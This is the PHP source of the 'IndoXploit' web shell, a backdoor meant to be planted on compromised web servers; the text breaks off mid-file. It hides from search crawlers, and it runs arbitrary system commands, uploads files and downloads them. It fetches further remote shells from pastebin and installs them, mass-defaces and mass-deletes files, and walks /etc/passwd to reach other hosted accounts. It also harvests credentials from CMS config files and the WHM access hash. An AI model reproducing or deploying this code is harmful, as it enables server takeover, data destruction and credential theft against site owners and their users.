print
Suck mother pls
<?php
session_start();
error_reporting(0);
set_time_limit(0);
@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);

$password = "7b4939a8af28c814f0c757bb10f40d3d"; # md5: IndoXploit

$SERVERIP  = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
$FILEPATH  = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

function login_shell() {
?>
<!DOCTYPE HTML>
<html>
<head>
<title>IndoXploit</title>
<style type="text/css">
html {
    margin: 20px auto;
    background: #000000;
    color: green;
    text-align: center;
}
header {
    color: green;
    margin: 10px auto;
}
input[type=password] {
    width: 250px;
    height: 25px;
    color: red;
    background: transparent;
    border: 1px dotted green;
    margin-left: 20px;
    text-align: center;
}
</style>
</head>
<center>
<header>
    <pre>
 ___________________________
< root@indoxploit:~# w00t??? >
 ---------------------------
            ,        ,
           /(        )`
           \___   / |
            /- _  `-/  '
           (//    /
           / /   | `   
           O O   ) /    |
           `-^--'`<     '
          (_.)  _  )   /
           `.___/`    /
             `-----' /
<----.     __ / __  
<----|====O)))==) ) /====>
<----'    `--' `.__,'
             |        |
                     /
        ______( (_  / \______
      ,'  ,-----'   |       
      `--{__________)        /
    </pre>
</header>
<form method="post">
<input type="password" name="password">
</form>
<?php
exit;
}

if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if(empty($password) || (isset($_POST['password']) && (md5($_POST['password']) == $password)))
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        login_shell();

if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}

if(get_magic_quotes_gpc()) {
    function idx_ss($array) {
        return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
    }
    $_POST = idx_ss($_POST);
}
?>
<!DOCTYPE HTML>
<html>
<!--
###############################################################################
// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
// Tanpa kalian kita tidak akan BESAR seperti sekarang.
// Greetz: All Member IndoXploit. & All My Friends.
###############################################################################
// Special Thanks: Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################
-->
<head>
<title>IndoXploit</title>
<meta name='author' content='IndoXploit'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
    background: #000000;
    color: #ffffff;
    font-size: 14px;
    width: 100%;
}

li {
    display: inline;
    margin: 5px;
    padding: 5px;
}

a {
    color: #ffffff;
    text-decoration: none;
}

a:hover {
    color: gold;
    text-decoration: underline;
}

b {
    color: gold;
}

pre {
    font-size: 13px;
}

table, th, td {
    border-collapse:collapse;
    background: transparent;
    font-family: 'Ubuntu';
    font-size: 13px;
}

.table_home, .th_home, .td_home {
    border: 1px solid #ffffff;
}

.th_home {
    color: lime;
}

.td_home, .td_home > a {
    color: #ffffff;
}

.td_home > a:hover {
    color: gold;
}

th {
    padding: 10px;
}

tr:hover {
    background: #006400;
    color: #ffffff;
}

input[type=text], input[type=password], .input {
    background: transparent;
    color: #ffffff;
    border: 1px solid #ffffff;
    padding: 3px;
    font-family: 'Ubuntu';
    font-size: 13px;
}

input[type=submit] {
    padding: 2px;}

input[type=submit]:hover {
    cursor: pointer;
}

input:focus, textarea:focus {
  outline: 0;
  border-color: #ffffff;
}

textarea {
    border: 1px solid #ffffff;
    width: 100%;
    height: 400px;
    padding-left: 5px;
    margin: 10px auto;
    resize: none;
    background: transparent;
    color: #ffffff;
    font-family: 'Ubuntu';
    font-size: 13px;
}
iframe {
    width: 100%;
    min-height: 500px;
}
</style>
</head>
<body>
<?php
function path() {
    if(isset($_GET['dir'])) {
        $dir = str_replace("\", "/", $_GET['dir']);
        @chdir($dir);
    } else {
        $dir = str_replace("\", "/", getcwd());
    }
    return $dir;
}

function color($bold = 1, $colorid = null, $string = null) {
        $color = array(
            "</font>",              # 0 off
            "<font color='red'>",    # 1 red
            "<font color='lime'>",    # 2 lime
            "<font color='white'>",    # 3 white
            "<font color='gold'>",    # 4 gold
        );

    return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
}

function OS() {
    return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";
}

function exe($cmd) {
    if(function_exists('system')) {         
        @ob_start();         
        @system($cmd);         
        $buff = @ob_get_contents();         
        @ob_end_clean();         
        return $buff;     
    } elseif(function_exists('exec')) {         
        @exec($cmd,$results);         
        $buff = "";         
        foreach($results as $result) {             
            $buff .= $result;         
        } return $buff;     
    } elseif(function_exists('passthru')) {         
        @ob_start();         
        @passthru($cmd);         
        $buff = @ob_get_contents();         
        @ob_end_clean();         
        return $buff;     
    } elseif(function_exists('shell_exec')) {         
        $buff = @shell_exec($cmd);         
        return $buff;     
    }
}

function save($filename, $mode, $file) {
    $handle = fopen($filename, $mode);
    fwrite($handle, $file);
    fclose($handle);
    return;
}

function getfile($name) {
    if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
    if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
    elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
    elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
    elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");

    $fp = fopen($get[1], "w");
    $ch = curl_init();
           curl_setopt($ch, CURLOPT_URL, $get[0]);
           curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
             curl_setopt($ch, CURLOPT_FILE, $fp);
    return curl_exec($ch);
             curl_close($ch);
    fclose($fp);
    ob_flush();
    flush();
}

function usergroup() {
    if(!function_exists('posix_getegid')) {
        $user['name']     = @get_current_user();
        $user['uid']      = @getmyuid();
        $user['gid']      = @getmygid();
        $user['group']    = "?";
    } else {
        $user['uid']     = @posix_getpwuid(posix_geteuid());
        $user['gid']     = @posix_getgrgid(posix_getegid());
        $user['name']     = $user['uid']['name'];
        $user['uid']     = $user['uid']['uid'];
        $user['group']     = $user['gid']['name'];
        $user['gid']     = $user['gid']['gid'];
    }
    return (object) $user;
}

function getuser() {
    $fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
    while($read = fgets($fopen)) {
        preg_match_all('/(.*?):x:/', $read, $getuser);
        $user[] = $getuser[1][0];
    }
    return $user;
}

function getdomainname() {
    $fopen = fopen("/etc/named.conf", "r");
    while($read = fgets($fopen)) {
        preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
        $domain[] = $getdomain[1][0];
    }
    return $domain;
}

function hddsize($size) {
    if($size >= 1073741824)
        return sprintf('%1.2f',$size / 1073741824 ).' GB';
    elseif($size >= 1048576)
        return sprintf('%1.2f',$size / 1048576 ) .' MB';
    elseif($size >= 1024)
        return sprintf('%1.2f',$size / 1024 ) .' KB';
    else
        return $size .' B';
}

function hdd() {
    $hdd['size'] = hddsize(disk_total_space("/"));
    $hdd['free'] = hddsize(disk_free_space("/"));
    $hdd['used'] = $hdd['size'] - $hdd['free'];
    return (object) $hdd;
}

function writeable($path, $perms) {
    return (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);
}

function perms($path) {
    $perms = fileperms($path);
    if (($perms & 0xC000) == 0xC000) {
        // Socket
        $info = 's';
    }
    elseif (($perms & 0xA000) == 0xA000) {
        // Symbolic Link
        $info = 'l';
    }
    elseif (($perms & 0x8000) == 0x8000) {
        // Regular
        $info = '-';
    }
    elseif (($perms & 0x6000) == 0x6000) {
        // Block special
        $info = 'b';
    }
    elseif (($perms & 0x4000) == 0x4000) {
        // Directory
        $info = 'd';
    }
    elseif (($perms & 0x2000) == 0x2000) {
        // Character special
        $info = 'c';
    }
    elseif (($perms & 0x1000) == 0x1000) {
        // FIFO pipe
        $info = 'p';
    }
    else {
        // Unknown
        $info = 'u';
    }
        // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ?
    (($perms & 0x0800) ? 's' : 'x' ) :
    (($perms & 0x0800) ? 'S' : '-'));
    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ?
    (($perms & 0x0400) ? 's' : 'x' ) :
    (($perms & 0x0400) ? 'S' : '-'));
    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ?
    (($perms & 0x0200) ? 't' : 'x' ) :
    (($perms & 0x0200) ? 'T' : '-'));

    return $info;
}

function lib_installed() {
    $lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
    $lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
    $lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
    $lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
    $lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
    return implode(" | ", $lib);
}

function pwd() {
    $dir = explode("/", path());
    foreach($dir as $key => $index) {
        print "<a href='?dir=";
        for($i = 0; $i <= $key; $i++) {
            print $dir[$i];
            if($i != $key) {
            print "/";
            }
        }
        print "'>$index</a>/";
    }
    print "<br>";
    print (OS() === "Windows") ? windisk() : "";
}

function windisk() {
    $letters = "";
    $v = explode("\", path());
    $v = $v[0];
     foreach(range("A", "Z") as $letter) {
          $bool = $isdiskette = in_array($letter, array("A"));
          if(!$bool) $bool = is_dir("$letter:\");
          if($bool) {
               $letters .= "[ <a href='?dir=$letter:\'".($isdiskette?" onclick="return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')"":"").">";
               if($letter.":" != $v) {
                   $letters .= $letter;
               }
               else {
                   $letters .= color(1, 2, $letter);
               }
               $letters .= "</a> ]";
          }
    }
    if(!empty($letters)) {
        print "Detected Drives $letters<br>";
    }
    if(count($quicklaunch) > 0) {
        foreach($quicklaunch as $item) {
              $v = realpath(path(). "..");
              if(empty($v)) {
                  $a = explode(DIRECTORY_SEPARATOR,path());
                  unset($a[count($a)-2]);
                  $v = join(DIRECTORY_SEPARATOR, $a);
              }
              print "<a href='".$item[1]."'>".$item[0]."</a>";
        }
    }
}

function serverinfo() {
    $disable_functions = @ini_get('disable_functions');
    $disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");

    $output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
    $output[] = "WEB SERVER  : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
    $output[] = "SYSTEM      : ".color(1, 2, php_uname());
    $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
    $output[] = "HDD         : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
    $output[] = "PHP VERSION : ".color(1, 2, @phpversion());
    $output[] = "SAFE MODE   : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
    $output[] = "DISABLE FUNC: $disable_functions";
    $output[] = lib_installed();
    $output[] = "Current Dir (".writeable(path(), perms(path())).") ";

    print "<pre>";
    print implode("<br>", $output);
    pwd();
    print "</pre>";

}

function curl($url, $post = false, $data = null) {
    $ch = curl_init($url);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
          curl_setopt($ch, CURLOPT_TIMEOUT, 10);
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    if($post) {
          curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    $curl['exec'] = curl_exec($ch);
    $curl['info'] = curl_getinfo($ch);

    return [
        "info"         => $curl['info'],
        "response"     => $curl['exec']
    ];

          curl_close($ch);
}

function reverse() {
    $response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=")['response'];
    $response = str_replace("[","", str_replace("]","", str_replace("""","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
    $explode  = explode(",,", $response);
    unset($explode[0]);

    foreach($explode as $domain) {
        $domain = "http://$domain";
        $domain = str_replace(",", "", $domain);
        $url[]     = $domain;
        ob_flush();
        flush();
    }

    return $url;
}

function getValue($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    $start     = strpos($param, $kata1) + strlen($kata1);
    $end     = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}

function massdeface($dir, $file, $filename, $type = null) {
    $scandir = scandir($dir);
    foreach($scandir as $dir_) {
        $path     = "$dir/$dir_";
        $location = "$path/$filename";
        if($dir_ === "." || $dir_ === "..") {
            file_put_contents($location, $file);
        }
        else {
            if(is_dir($path) AND is_writable($path)) {
                print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";
                file_put_contents($location, $file);
                if($type === "-alldir") {
                    massdeface($path, $file, $filename, "-alldir");
                }
            }
        }
    }
}

function massdelete($dir, $filename) {
    $scandir = scandir($dir);
    foreach($scandir as $dir_) {
        $path     = "$dir/$dir_";
        $location = "$path/$filename";
        if($dir_ === '.') {
            if(file_exists("$dir/$filename")) {
                unlink("$dir/$filename");
            }
        }
        elseif($dir_ === '..') {
            if(file_exists(dirname($dir)."/$filename")) {
                unlink(dirname($dir)."/$filename");
            }
        }
        else {
            if(is_dir($path) AND is_writable($path)) {
                if(file_exists($location)) {
                    print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";
                    unlink($location);
                    massdelete($path, $filename);
                }
            }
        }
    }
}

function tools($toolsname, $args = null) {
    if($toolsname === "cmd") {
        print "<form method='post' action='?do=cmd&dir=".path()."' style='margin-top: 15px;'>
              ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
              <input style='border: none; border-bottom: 1px solid #ffffff;' type='text' name='cmd' required>
              <input style='border: none; border-bottom: 1px solid #ffffff;' class='input' type='submit' value='>>'>
              </form>";
    }
    elseif($toolsname === "readfile") {
        if(empty($args)) die(color(1, 1, $msg));
        if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));

        print "<pre>";
        print htmlspecialchars(file_get_contents($args));
        print "</pre>";
    }
    elseif($toolsname === "spawn") {
        if($args === "adminer") {
            if(file_exists("adminer.php")) {
                print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
            }
            else {
                if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
                if(getfile("adminer")) {
                    print "Login Adminer: <a href='".$GLOBALS['FILEPATH']."/adminer.php' target='_blank'>http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php</a>";
                }
                else {
                    print color(1, 1, "Error while downloading file Adminer.");
                    @unlink("adminer.php");
                }
            }
        }
        elseif($args === "webconsole") {
            if(file_exists("webconsole.php")) {
                print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
            }
            else {
                if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
                if(getfile("webconsole")) {
                    print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/webconsole.php' frameborder='0' scrolling='yes'></iframe>";
                }
                else {
                    print color(1, 1, "Error while downloading file WebConsole.");
                    @unlink("webconsole.php");
                }
            }
        }
        elseif($args === "cgitelnet1") {
            if(file_exists("idx_cgi/cgitelnet1.idx")) {
                print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
            }
            elseif(file_exists('cgitelnet1.idx')) {
                print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
            }
            else {
                if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
                if(!is_dir(path()."/idx_cgi/")) {
                    @mkdir('idx_cgi', 0755);
                    save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
                }
                if(getfile("cgitelnet1")) {
                    chmod('idx_cgi/cgitelnet1.idx', 0755);
                    print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet1.idx' frameborder='0' scrolling='yes'></iframe>";
                }
                else {
                    print color(1, 1, "Error while downloading file CGI Telnet.");
                    @rmdir(path()."/idx_cgi/");
                    if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
                    if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
                }
            }
    
        }
        elseif($args === "cgitelnet2") {
            if(file_exists("idx_cgi/cgitelnet2.idx")) {
                print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
            }
            elseif(file_exists('cgitelnet2.idx')) {
                print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/cgitelnet2.idx' frameborder='0' scrolling='no'></iframe>";
            }
            else {
                if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
                if(!is_dir(path()."/idx_cgi/")) {
                    @mkdir('idx_cgi', 0755);
                    save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
                }
                if(getfile("cgitelnet2")) {
                    chmod('idx_cgi/cgitelnet2.idx', 0755);
                    print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_cgi/cgitelnet2.idx' frameborder='0' scrolling='yes'></iframe>";
                }
                else {
                    print color(1, 1, "Error while downloading file CGI Telnet.");
                    @rmdir(path()."/idx_cgi/");
                    if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
                    if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
                }
            }
    
        }
        elseif($args === "phpinfo") {
            if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
                print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
            }
            else {
                if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
                save("phpinfo.php", "w", "<?php print '<html><style>html,body {background: #000000;}</style><div style='background: #000000; color: #cccccc;'>'; phpinfo(); print '</div></html>'; ?>");
                print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/phpinfo.php' frameborder='0' scrolling='yes'></iframe>";
            }
        }
    }
    elseif($toolsname === "upload") {
        if($_POST['upload']) {
            if($_POST['uploadtype'] === '1') {
                if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
                    $act = color(1, 2, "Uploaded!")." at <i><b>".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."</b></i>";
                }
                else {
                    $act = color(1, 1, "Failed to upload file!");
                }
            }
            elseif($_POST['uploadtype'] === '2') {
                $root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
                $web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
                if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
                    if(@copy($_FILES['file']['tmp_name'], $root)) {
                        $act = color(1, 2, "Uploaded!")." at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
                    }
                    else {
                        $act = color(1, 1, "Failed to upload file!");
                    }
                }
                else {
                    $act = color(1, 1, "Failed to upload file!");
                }
            }
        }
        print "Upload File: $act
              <form method='post' enctype='multipart/form-data'>
              <input type='radio' name='uploadtype' value='1' checked>current_dir [ ".writeable(path(), "Writeable")." ]
              <input type='radio' name='uploadtype' value='2'>document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]<br>
              <input type='file' name='file'>
              <input type='submit' value='upload' name='upload'>
              </form>";
    }
    elseif($toolsname === "jumping") {
        $i = 0;
        foreach(getuser() as $user) {
            $path = "/home/$user/public_html";
            if(is_readable($path)) {
                $status = color(1, 2, "[R]");
                if(is_writable($path)) {
                    $status = color(1, 2, "[RW]");
                }
                $i++;
                print "$status <a href='?dir=$path'>".color(1, 4, $path)."</a>";
                if(!function_exists('posix_getpwuid')) print "<br>";
                if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."<br>";
                foreach(getdomainname() as $domain) {
                    $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
                    $userdomain = $userdomain->name;
                    if($userdomain === $user) {
                        print " => <a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
                        break;
                    }
                }
            }
        }
        print ($i === 0) ? "" : "<p>".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."</p>";
    }
    elseif($toolsname === "idxconfig") {
        if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
        if(!is_dir(path()."/idx_config/")) {
            @mkdir('idx_config', 0755);
            $htaccess = "Options all DirectoryIndex indoxploit.htm Satisfy Any";
            save("idx_config/.htaccess","w", $htaccess);

            foreach(getuser() as $user) {
                $user_docroot = "/home/$user/public_html/";
                if(is_readable($user_docroot)) {
                    $getconfig = array(
                        "/home/$user/.accesshash" => "WHM-accesshash",
                        "$user_docroot/config/koneksi.php" => "Lokomedia",
                        "$user_docroot/forum/config.php" => "phpBB",
                        "$user_docroot/sites/default/settings.php" => "Drupal",
                        "$user_docroot/config/settings.inc.php" => "PrestaShop",
                        "$user_docroot/app/etc/local.xml" => "Magento",
                        "$user_docroot/admin/config.php" => "OpenCart",
                        "$user_docroot/application/config/database.php" => "Ellislab",
                        "$user_docroot/vb/includes/config.php" => "Vbulletin",
                        "$user_docroot/includes/config.php" => "Vbulletin",
                        "$user_docroot/forum/includes/config.php" => "Vbulletin",
                        "$user_docroot/forums/includes/config.php" => "Vbulletin",
                        "$user_docroot/cc/includes/config.php" => "Vbulletin",
                        "$user_docroot/inc/config.php" => "MyBB",
                        "$user_docroot/includes/configure.php" => "OsCommerce",
                        "$user_docroot/shop/includes/configure.php" => "OsCommerce",
                        "$user_docroot/os/includes/configure.php" => "OsCommerce",
                        "$user_docroot/oscom/includes/configure.php" => "OsCommerce",
                        "$user_docroot/products/includes/configure.php" => "OsCommerce",
                        "$user_docroot/cart/includes/configure.php" => "OsCommerce",
                        "$user_docroot/inc/conf_global.php" => "IPB",
                        "$user_docroot/wp-config.php" => "Wordpress",
                        "$user_docroot/wp/test/wp-config.php" => "Wordpress",
                        "$user_docroot/blog/wp-config.php" => "Wordpress",
                        "$user_docroot/beta/wp-config.php" => "Wordpress",
                 &nb